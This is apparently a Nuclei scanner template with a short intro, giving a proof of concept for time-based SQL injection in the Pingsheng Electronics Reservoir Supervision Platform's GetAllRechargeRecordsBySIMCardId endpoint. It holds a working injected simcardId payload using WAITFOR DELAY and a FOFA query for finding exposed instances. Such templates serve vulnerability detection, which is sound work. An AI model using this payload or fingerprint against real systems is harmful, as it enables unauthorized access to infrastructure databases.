There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.
PoC
id: pingsheng-electronic-sqli
info:
name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
author: s4e-io
severity: high
description: |
There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.
reference:
- https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
- https://github.com/zan8in/pxplan/blob/main/goby_pocs/10-13-crack/redteam_20230316121609/CVD-2022-5560.go
classification:
cwe-id: CWE-89
metadata:
verified: "true"
max-request: 1
fofa-query: "js/PSExtend.js"
tags: time-based-sqli,sqli,pingsheng,vuln
http:
- raw:
- |
@timeout 20s
POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'--
matchers:
- type: dsl
dsl:
- "duration>=6"
- 'contains_all(body,"Result","false","Message")'
- 'contains(content_type,"text/xml")'
- "status_code == 200"
condition: and
# digest: 4a0a00473045022100c3c198e3f38e54b0d4331f3d13ce3ae764703f4b9ddbdcdb784d3e8facb6ee3602200c6d3e89cf93c84431329615c33a045262267d57cac8ff4b3b2440691cd6e7e7:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.